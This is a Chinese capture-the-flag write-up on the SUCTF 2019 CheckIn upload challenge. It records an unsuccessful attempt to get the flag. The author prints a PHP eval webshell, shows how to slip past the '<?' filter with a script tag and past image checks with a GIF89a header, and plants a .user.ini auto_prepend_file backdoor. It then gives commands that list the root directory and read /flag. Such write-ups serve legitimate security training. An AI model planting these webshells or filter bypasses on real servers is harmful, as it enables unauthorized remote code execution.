练习 9 Web [SUCTF 2019]CheckIn (未拿到flag)

上传图片格式的木马文件:

返回 <? in contents!,存在PHP代码检测

上传非图片格式文件:

返回 不允许非image

修改木马PHP代码规避检测

php 复制代码
<? ?> 改为 < script language="php">< /script >

<?php @eval($_POST['shell']);?> 

<script language='php'>@eval($_POST['shell']);</script>

上传强行加上gif文件头的GIF图片木马

php 复制代码
GIF89a?<script language='php'>@eval($_POST['shell']);</script>

返回如下内容:上传文件位置

现在传上去,因为还是图片格式文件,没有办法执行

尝试在"练习5"中提到的.htaccess文件,发现也被过滤了

卡住,搜索其他wp

新内容:user.ini文件
[SUCTF 2019]CheckIn 1
user.ini文件构成的PHP后门
BUUCTF | [SUCTF 2019]CheckIn

因为本题过滤非图片格式,所以必须加上前面的"GIF89a"

php 复制代码
GIF89a                  //绕过exif_imagetype()
auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。
auto_append_file=a.jpg  //解析后进行包含

uploads/18de044ce1c88142786756f6f8015474/index.php

cmd=var_dump(scandir("/"));

cmd=var_dump(file_get_contents("/flag"));

但最后始终刷不出来,不知道什么情况,蚁剑也死活连不上

相关推荐
时间的情敌3 小时前
基于 Vue3 及TypeScript 项目后的总结
前端·vue.js·typescript
纯爱掌门人4 小时前
鸿蒙端云一体化云存储实战:手把手教你玩转文件上传下载
前端·harmonyos
非凡ghost4 小时前
图吧工具箱-电脑硬件圈的“瑞士军刀”
前端·javascript·后端
非凡ghost4 小时前
Xrecode3(多功能音频转换工具)
前端·javascript·后端
橙某人4 小时前
飞书多维表格插件:进一步封装,提升开发效率!🚀
前端·javascript
他们叫我秃子4 小时前
从 0 到 1,我用小程序 + 云开发打造了一个“记忆瓶子”,记录那些重要的日子!
前端·微信小程序·小程序·云开发
非凡ghost4 小时前
Subtitle Edit(字幕编辑软件) 中文绿色版
前端·javascript·后端
扎瓦斯柯瑞迫4 小时前
cursor: 10分钟魔改环境、优雅获取Token
前端·javascript·后端
王六岁4 小时前
🐍 前端开发 0 基础学 Python 入门指南:条件语句篇
前端·python
San304 小时前
CSS3 星球大战:用前端技术打造震撼的3D动画效果
前端·css·html